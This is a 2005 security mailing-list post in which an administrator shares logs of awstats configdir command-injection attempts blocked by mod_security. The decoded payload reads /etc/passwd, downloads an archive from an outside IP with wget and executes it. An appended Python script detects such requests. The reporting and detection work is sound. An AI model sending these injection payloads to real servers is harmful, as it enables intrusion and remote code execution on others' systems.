[Dshield] awstats exploits

Andy Brown andy.brown at interv8.co.uk
Thu Mar 17 11:02:37 GMT 2005


We're getting lots of awstats exploits at present. Is anyone else getting them? 
We're getting hit almost hourly by various IPs from all over 
(looking like exploited ADSL systems).

I've now installed mod_security to keep tabs on/block these things. 
Raw logs of the attacks:

Request: 62.177.120.22 - - [17/Mar/2005:04:04:29 +0000] "GET 
/cgi/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1" 500 540
Handler: (null)
----------------------------------------
GET 
/cgi/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1
Accept: */*
Connection: close
Host: 217.22.154.14
mod_security-message: Access denied with code 500. Pattern match "wget" at 
THE_REQUEST.
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 62.177.120.22 - - [17/Mar/2005:04:04:30 +0000] "GET 
/awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1" 500 540
Handler: cgi-script
----------------------------------------
GET 
/awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1
Accept: */*
Connection: close
Host: 217.22.154.14
mod_security-message: Access denied with code 500. Pattern match "wget" at 
THE_REQUEST.
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 62.177.120.22 - - [17/Mar/2005:04:04:30 +0000] "GET 
/stat-cgi/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3bcho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1" 500 540
Handler: (null)
----------------------------------------
GET 
/stat-cgi/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3bcho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1
Accept: */*
Connection: close
Host: 217.22.154.14
mod_security-message: Access denied with code 500. Pattern match "wget" at 
THE_REQUEST.
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 62.177.120.22 - - [17/Mar/2005:04:04:31 +0000] "GET 
/awstats/perl/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1" 500 540
Handler: cgi-script
----------------------------------------
GET 
/awstats/perl/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1
Accept: */*
Connection: close
Host: 217.22.154.14
mod_security-message: Access denied with code 500. Pattern match "wget" at 
THE_REQUEST.
mod_security-action: 500



The URL-encoded bit turns into:
cat /etc/passwd;
uname -a;
id;
echo Muie;
cd /var/tmp;
wget http://208.53.164.135/boti.tgz;
tar xzvf boti.tgz;
cd ls;
./init;
echo -------------------------;
echo GAta BHa !!;
echo e_exp


And I managed to get a copy of boti.tgz, which is just an IRC server.


-- 
Regards,
Andy <andy @ thebmwz3.co.uk>  http://www.thebmwz3.co.uk/
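As an added example (not part of Andy's post or of mod_security), here is a small audit-log checker that works on the layout quoted above: it pulls each "Request:" line, percent-decodes the awstats query string and flags any configdir value that starts with a pipe, which is the %7c at the front of every payload in the post. Matching on that character catches the whole class of requests rather than the single "wget" keyword the mod_security rule happened to hit. The log below is constructed, shortened, and uses TEST-NET addresses rather than the ones in the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the mod_security audit-log layout quoted in the post:
# one ordinary awstats request and one shortened configdir injection attempt.
# Addresses are TEST-NET values, not the ones from the post.
AUDIT_LOG = """\
Request: 192.0.2.10 - - [17/Mar/2005:04:04:29 +0000] "GET /cgi/awstats.pl?config=example.org&output=main HTTP/1.1" 200 1234
Handler: cgi-script
----------------------------------------
GET /cgi/awstats.pl?config=example.org&output=main HTTP/1.1

HTTP/1.1 200 OK
========================================
Request: 192.0.2.20 - - [17/Mar/2005:04:04:30 +0000] "GET /cgi/awstats.pl?configdir=%7cecho%20%3bid%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f203.0.113.5%2fx.tgz%3b%2500 HTTP/1.1" 500 540
Handler: (null)
----------------------------------------
GET /cgi/awstats.pl?configdir=%7cecho%20%3bid%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f203.0.113.5%2fx.tgz%3b%2500 HTTP/1.1
mod_security-message: Access denied with code 500. Pattern match "wget" at THE_REQUEST.
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
========================================
"""

# One audit-log "Request:" line: client, timestamp, method, URL, status.
REQUEST_RE = re.compile(
    r'^Request: (\S+) - - \[([^\]]+)\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})', re.M)


def audit_awstats(text):
    """Flag awstats.pl requests whose configdir value starts with '|'.

    That leading pipe (the %7c in the post's logs) is what turns the
    parameter into a shell command, so matching on it catches the attack
    class instead of one tool name such as "wget".
    """
    hits = []
    for client, ts, _method, url, status in REQUEST_RE.findall(text):
        parts = urlsplit(url)
        if not parts.path.endswith("awstats.pl"):
            continue
        # parse_qs percent-decodes once, so %7c becomes '|' and %3b becomes ';'.
        for value in parse_qs(parts.query, keep_blank_values=True).get("configdir", []):
            if value.lstrip().startswith("|"):
                cmds = [c.strip() for c in value.lstrip()[1:].split(";") if c.strip()]
                hits.append({"client": client, "time": ts, "path": parts.path,
                             "status": status, "commands": cmds})
    return hits
```

The ordinary request (config=, no pipe) produces no hit, so the check does not trip on legitimate awstats traffic the way a broad keyword rule can.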